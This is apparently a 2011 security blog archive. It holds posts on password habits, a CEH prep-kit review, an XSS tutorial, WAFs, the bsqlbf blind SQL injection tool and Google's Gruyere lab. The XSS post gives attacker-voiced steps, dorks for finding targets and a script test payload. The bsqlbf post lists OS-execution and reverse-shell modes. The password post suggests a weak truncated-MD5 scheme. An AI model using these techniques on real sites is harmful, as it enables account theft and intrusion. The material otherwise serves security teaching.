In fact, most data leaks and privacy breaches are the result of “insider jobs” by people who had physical access to the victim’s computer or storage media. (It would be much easier for me to steal your laptop from your home, than for me to break into Google’s datacenter and steal the hard drive that stores your Gmail content).  But it only takes one bad apple or one security leak to put your password into the wrong hands. And once that happens, then all of the other accounts which depend on this password will be compromised.

There are a number of ways that you can protect yourself from the possibility of having your password stolen in this manner.

One simple way would be to make use of sites which feature single sign-on (such as OpenID), or where a single login lets you access multiple services (like your Google account). There are also a number of specialized apps which let you manage multiple online accounts from a single interface. This has the advantage that your credentials are only stored in a single central repository. (Every time you make a copy of a password, the chances of a data breach go up.) Of course, this still leaves you open to a breach in the event that someone steals your password, but at least it makes such breaches more difficult. Also, such a breach might leave suspicious activity patterns that could get flagged and blocked. (For example, many SaaS providers can block or flag access coming in from an anonymizing proxy.)

The ideal scenario would be to have some sort of multi-factor authentication that requires access from a specified IP address. At the moment, only a few SaaS apps offer this ability.

If you choose to aggregate your credentials in this manner, you should only do so for low-priority online services. Any services that require the handling of sensitive information should have their own dedicated unique highly-random passwords.

Another method for managing multiple accounts using a single set of credentials would be to use a single password which is scrambled using a hint that is unique to the account in question. For example, a user whose password is “pUpp1e5” could combine this password with the web site name and create an MD5 hash where the first 10 characters would be the new password.  So the password+site string “pUpp1e5 salesforce.com” might hash to “50f49dd6f3f838fb74ca1b7de5898c48”. And the new password would be 50f49dd6f3.
But the absolute best way to prevent your passwords from being used against you would be to generate and memorize completely random passwords for every account you open. Although this takes a bit of discipline, it's not as hard as it sounds.

Many people will rely on mnemonic systems which turn these passwords into easy-to-visualize sentences.
For example:
“Y!14gtP” could be turned into “Yolanda surprised 14 green turtles named Peter”
Although these mnemonic systems are ok for short-term memorization, I’ve found that their effectiveness is overrated. For a number of reasons - which would take too long to go into for this article – I find that there’s no substitute for good old-fashioned memorization through repetition.

Here is a technique that works for me.
  • Step 1: Generate a random password and memorize it mnemonically or write it down somewhere safe. (Maybe an encrypted file)
  • Step 2: Log in and out 5 times in a row to build muscle memory.
  • Step 3: The next day, log in and out again 5 times using the new password.
  • Step 4: One week later, log in and out again 5 times using the new password.
You can now go ahead and destroy the written or saved copy of the password. By this point, you should have the password memorized for life. (Or until you’re ready to change it again)
Now that we’re living in the “cloud age”, users need to be more aggressive than ever when it comes to maintaining effective password management habits.
About The Author:
For over ten years, Storagepipe has been providing online server backup services that help companies maintain the safety, security and confidentiality of their private data.


Saturday, October 15, 2011

Certified Ethical Hacker(CEH) 312-50-v7 Practice Test from Ucertify


Ethical Hacking Tutorials Blog is introducing a new feature called Certification Preparation Showcase to introduce blog readers to certification preparation education providers and their products. This independent review will highlight the features available in the offerings so that blog readers are aware of the vendors. This blog does not endorse or recommend any specific vendor. Certification candidates should use their best judgment before buying any products or services reviewed on this blog. EC-Council Advisor hopes that Certification Preparation Showcase will assist blog readers in the evaluation of certification related products or services.


The first product being reviewed in the Cert Prep Showcase is uCertify PrepKit from uCertify LLC. The company has been offering certification preparation study kits for more than a decade. The current portfolio covers certification study material for leading companies such as Microsoft, EC-Council, Cisco, IBM and others.

The certification preparation material is available as a download, with a 15-question diagnostic test available for free. If you have bought the kit, a license key will reach your e-mail inbox to activate the complete features of the kit. The exam PrepKit consists of a Test Engine with multiple simulated tests. For review purposes, I downloaded the 312-50-v7 Certified Ethical Hacker V7 kit. There are 5 full-length practice tests and 1 'Final Test' to prepare oneself for the actual exam. One can also create a custom test and a fixed-time test using the question bank in the test engine.


The test kit also provides nearly 300 flash cards, study notes and tips for taking the exam. The test kit covers all the sections mentioned in the exam content on the certification website. The test engine has been built to closely resemble the testing platform one would encounter for an actual exam. So preparing for a certification exam using the PrepKit will be a familiar experience on exam day. The best benefit of a Test PrepKit like this would be to use as a test simulation tool rather than a guide to learn concepts. There are several EC-Council Press and other publications available for reference guides.

EC-COUNCIL Advisor: Please tell us about your company. From when did you start offering EC-Council Certification prep kits?

Jon: uCertify is a leading training provider for the IT Certifications exams. For the past 15 years, uCertify has specialized in exam preparation solutions for all major certification exams, from vendors, such as Microsoft, EC-Council, Adobe, CompTIA, Cisco, EC Council and more. We are available 24 x 7 x 365. All uCertify PrepKits come with a 100% money back guarantee, which is the best in the business. Students pass in their first attempt using our prepkits, else we refund the cost of the prepkit. uCertify is committed to serving its customers with innovative, reliable, and high-quality products through constant research and development, keeping in mind the latest pattern of the various exams. We began offering our prepkits for EC-Council certifications back in 2003. Since then, we have continuously added to the EC-Council test prep suite keeping up with EC-Council’s certification offerings, including all Sun based prepkits.

EC-Council Advisor: When would you recommend a candidate to start using your prep kit?

Jon: We recommend that students begin using our prepkits as soon as possible. Our prepkits provide information about exam objectives, lots of study material and dozens of practice questions which not only help reinforce concepts but hone practice skills until students have achieved mastery of the subject.

EC-COUNCIL Advisor: Tell us how you develop the practice tests?

Jon: Our prepkits are crafted by industry experts from within uCertify, as well as from the field. They are typically certified professionals themselves, and are subject matter experts in the area of certification they are writing for. These professionals understand the problems that students face while preparing for their certification exams, and ensure that the prepkit material they author helps students pass their certification exam on their first attempt.

EC-COUNCIL Advisor: You advertise a very high success rate in certification exams (98% plus) for your customers. What makes that possible?

Jon: uCertify places a very high emphasis on content quality. Our content authors, be it in-house uCertify employees, or contracted IT professionals with relevant experience, are held to extremely high standards. In addition to stringent checklists and peer reviews, several prepkits are also reviewed by ProCertLabs, a company regarded by many certification vendors, as being very qualified to review a test prep provider’s work. Every piece of material in our prepkits is authored and reviewed via a strict checklist to ensure high quality standards.

EC-COUNCIL Advisor: What advice would you give to EC-Council certification candidates preparing for certification exams?

Jon: Practice, Practice, Practice! Invest in a high quality prepkit provider such as uCertify, and go through all study material, and take/retake the tests until they score 95% or higher in all the practice tests they take. Readers of EC-COUNCIL blog can use discount code: UCPREP when checking out and avail of a 10% discount. 

Friday, October 14, 2011

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability



What is XSS?
Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

In a typical XSS attack, a hacker injects malicious JavaScript code into a legitimate website. When a user visits the specially crafted link, the malicious JavaScript is executed. A successfully exploited XSS vulnerability allows attackers to carry out phishing attacks, steal accounts and even spread worms.
Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail and injected a malicious script. When a user visits the site, the malicious script is executed. The malicious code can be used to redirect users to a fake Gmail page or to capture cookies. Using the stolen cookies, the attacker can log into your account and change the password.
XSS will be easier to understand if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of HTTP client-server architecture (Reference).
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP).

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use Google dorks such as "?search=" or ".php?q=" to find vulnerable sites. More skilled attackers target specific sites instead of relying on Google search. If you are going to test your own site, you have to check every page of your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find an input field into which we can inject our own script, for example a search box, a username or password field, or any other input field.


Test 1 :
Once we have found the input field, let us try putting a string into it; for instance, enter "BTS". The page will display the result.

Now right-click on the page and select View Source. Search for the string "BTS" that we entered in the input field, and note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitizes our input. To do this, enter the <script> tag in the input field.
View the source of the page and find the location where the input was displayed in the previous test.

Thank god, our code is not being sanitized by the server: the source contains exactly what we entered in the field. If the server sanitized our input, it would look like this instead: &lt;script&gt;. An unsanitized reflection indicates that the website is vulnerable to XSS and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is probably vulnerable to XSS. But let us make sure by injecting a complete JavaScript snippet; for instance, enter <script>alert('BTS')</script>.

The page will now display a pop-up box with the string 'BTS'. We have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.

Types of XSS based on persistence:
Based on persistence, we can categorize XSS attacks into two types, namely Persistent and Non-Persistent.

Persistent XSS:

A Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database and is then served permanently as part of the normal page.

For example:
Many websites host a support forum where registered users can ask questions by posting messages, which are stored in the database. Imagine that an attacker instead posts a message containing malicious JavaScript code. If the server fails to sanitize the input, the injected script is executed whenever a user reads the post. If the injected code is cookie-stealing code, it steals the cookies of every user who reads the post. Using the cookie, the attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in an HTTP request. The server embeds the input in the HTML file and returns the file (the HTTP response) to the browser. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Consider a project hosting website. To find our favourite project, we type a related word into the search box. When the search finishes, the site displays a message like "search results for yourword". If the server fails to sanitize the input properly, the injected script is executed.

In a reflected XSS attack, the attacker sends the specially crafted link to victims and tricks them into clicking it. When the user clicks the link, the browser sends the injected code to the server, the server reflects it back in the response, and the browser executes it.

In addition to these types, there is a third type called DOM-based XSS, which I will explain in a later post.

What can an attacker do with this vulnerability?
  • Stealing identities and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing the session).
  • Malware attacks.
  • Website defacement.
  • Denial of Service attacks (DoS).

Disclaimer:
This article is intended for educational purpose only.

Wednesday, October 12, 2011

Introduction to Web Application Firewall (WAF) ~ Website Security


What is a WAF? WAF stands for Web Application Firewall. A WAF is a server-side application that controls input and output by filtering the HTTP communication. It can inspect network traffic at any OSI layer up to the Application Layer. The main purpose of a WAF is to provide better protection against the top web application vulnerabilities such as XSS (Cross Site Scripting), SQL Injection and RFI. Every day many websites are hacked because of these vulnerabilities. Read our Security News section to learn about the security risks on the Internet. A standard firewall blocks non-HTTP attacks (restricting ports, access, and so on); a WAF blocks HTTP attacks.

The Most common Web Application Vulnerabilities:

  • SQL Injection(SQLi)
  • Cross-Site Scripting (XSS)
  • Broken Authentication and Session Management
  • Insecure Direct Object References
  • Cross-Site Request Forgery (CSRF)
  • Security Misconfiguration
  • Insecure Cryptographic Storage
  • Failure to Restrict URL Access
  • Insufficient Transport Layer Protection
  • Unvalidated Redirects and Forwards


The Web Application Firewall (WAF) must meet the following requirements:
  • Protection Against Top Vulnerability(XSS,SQLi,..etc)
  • Very Few False Positives (i.e., should NEVER disallow an authorized request)
  • Strength of Default (Out of the Box) Defenses
  • Power and Ease of Learn Mode
  • Types of Vulnerabilities it can prevent.
  • Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
  • Both Positive and Negative Security model support.
  • Simplified and Intuitive User Interface.
  • Cluster mode support.
  • High Performance (milliseconds latency).
  • Complete Alerting, Forensics, Reporting capabilities.
  • Web Services\XML support.
  • Brute Force protection.
  • Ability to run in Active (block and log), Passive (log only) and bypass modes for the web traffic.
  • Ability to keep individual users constrained to exactly what they have seen in the current session
  • Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
  • Form Factor: Software vs. Hardware (Hardware generally preferred)
Top 10 Open Source Web Application Firewalls (WAF):

  1. ModSecurity (Trustwave SpiderLabs)
  2. AQTRONIX WebKnight
  3. ESAPI WAF
  4. WebCastellum
  5. BinarySec
  6. Guardian@JUMPERZ.NET
  7. OpenWAF
  8. Ironbee
  9. Profense
  10. Smoothwall

Tuesday, October 11, 2011

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer


What is Blind SQL Injection?
Some websites are vulnerable to SQL injection, but the results of the injection are not visible to the attacker. In this situation, blind SQL injection is used. The vulnerable page may not be one that displays data, but it displays differently depending on the result of a logical statement injected into the legitimate SQL statement for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

There are plenty of automated blind SQL injection tools available. Here I am introducing one named bsqlbf (Blind SQL Injection Brute Forcer).

This tool is written in Perl and allows extraction of data through blind SQL injections. It accepts custom SQL queries as a command-line parameter and works for both integer-based and string-based injections.
Supported Database:
  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle

The tool supports 8 attack modes (-type switch):
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in "order by" and "group by".

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:

-stype: How you want to execute command:

SType 0 (default) is based on java..will NOT work against XE.

SType 1 is against oracle 9 with plsql_native_make_utility.

SType 2 is against oracle 10 with dbms_scheduler.


Disclaimer:
This article is for educational purposes only. The above-mentioned software is developed for penetration testers to test their own web applications for vulnerabilities.

Sunday, October 9, 2011

Learn Web Application Exploits and Defenses for free~Penetration Testing


Are you willing to learn web application exploitation and how to defend against it? Here is your chance. Google Labs provides a lab for learning web application security free of cost.


Penetration Testing :
  • Learn how hackers find security vulnerabilities!
  • Learn how hackers exploit web applications!
  • Learn how to stop them! 
This code lab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following:
  • How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).
  • How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.
To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

Gruyere 
This codelab is built around Gruyere /ɡruːˈjɛər/ - a small, cheesy web application that allows its users to publish snippets of text and store assorted files. "Unfortunately," Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution. The goal of this codelab is to guide you through discovering some of these bugs and learning ways to fix them both in Gruyere and in general.

The codelab is organized by types of vulnerabilities. In each section, you'll find a brief description of a vulnerability and a task to find an instance of that vulnerability in Gruyere. Your job is to play the role of a malicious hacker and find and exploit the security bugs. In this codelab, you'll use both black-box hacking and white-box hacking. In black box hacking, you try to find security bugs by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess server behavior. You do not have access to the source code, although understanding how to view source and being able to view http headers (as you can in Chrome or LiveHTTPHeaders for Firefox) is valuable. Using a web proxy like Burp or WebScarab may be helpful in creating or modifying requests. In white-box hacking, you have access to the source code and can use automated or manual analysis to identify bugs. You can treat Gruyere as if it's open source: you can read through the source code to try to find bugs. Gruyere is written in Python, so some familiarity with Python can be helpful. However, the security vulnerabilities covered are not Python-specific and you can do most of the lab without even looking at the code. You can run a local instance of Gruyere to assist in your hacking: for example, you can create an administrator account on your local instance to learn how administrative features work and then apply that knowledge to the instance you want to hack. Security researchers use both hacking techniques, often in combination, in real life.

They tag each challenge to indicate which techniques are required to solve it:
  • Challenges that can be solved just by using black-box techniques.
  • Challenges that require you to look at the Gruyere source code.
  • Challenges that require some specific knowledge of Gruyere that will be given in the first hint.

WARNING: 
Accessing or attacking a computer system without authorization is illegal in many jurisdictions. While doing this codelab, you are specifically granted authorization to attack the Gruyere application as directed. You may not attack Gruyere in ways other than described in this codelab, nor may you attack App Engine directly or any other Google service. You should use what you learn from the codelab to make your own applications more secure. You should not use it to attack any applications other than your own, and only do that with permission from the appropriate authorities (e.g., your company's security team). 


Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com